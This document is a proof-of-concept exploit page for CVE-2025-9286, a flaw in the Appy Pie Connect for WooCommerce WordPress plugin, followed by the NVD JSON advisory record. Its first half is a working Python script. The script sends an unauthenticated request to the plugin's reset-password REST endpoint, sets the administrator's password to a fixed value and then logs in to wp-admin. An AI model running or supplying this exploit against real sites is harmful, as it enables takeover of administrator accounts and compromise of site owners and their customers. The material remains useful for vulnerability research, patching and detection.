CVE-2025-9286

# CVE-2025-9286 PoC - Appy Pie Connect for WooCommerce Privilege Escalation # Exploits missing authorization in reset_user_password() REST handler import requests # Target WordPress site URL target_url = "http://target-wordpress-site.com" # REST API endpoint for password reset (unauthenticated) reset_endpoint = f"{target_url}/wp-json/appy-pie-connect/v1/reset-password" # Target user ID (1 is typically the first administrator) target_user_id = 1 # New password to set for the target user new_password = "Pwned123!@#" # Construct the malicious request payload payload = { "user_id": target_user_id, "password": new_password } # Send the unauthenticated POST request to reset the admin password response = requests.post( reset_endpoint, json=payload, headers={"Content-Type": "application/json"} ) if response.status_code == 200: print(f"[+] Password reset successful!") print(f"[+] Admin credentials: admin / {new_password}") # Now login with the new credentials login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { "log": "admin", "pwd": new_password, "wp-submit": "Log In", "redirect_to": f"{target_url}/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) print(f"[+] Logged in as administrator") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(f"[-] Response: {response.text}")

{"cve": {"id": "CVE-2025-9286", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:47.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appy Pie Connect for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within the reset_user_password() REST handler in all versions up to, and including, 1.1.2. This makes it possible for unauthenticated attackers to to reset the password of arbitrary users, including administrators, thereby gaining administrative access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-620"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/appy-pie-connect-for-woocommerce/trunk/connect-woocommerce-rest-api.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3385150/", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/appy-pie-connect-for-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/36fb5b8d-1ea4-45c2-8639-b229efdb57db?source=cve", "source": "[email protected]"}]}}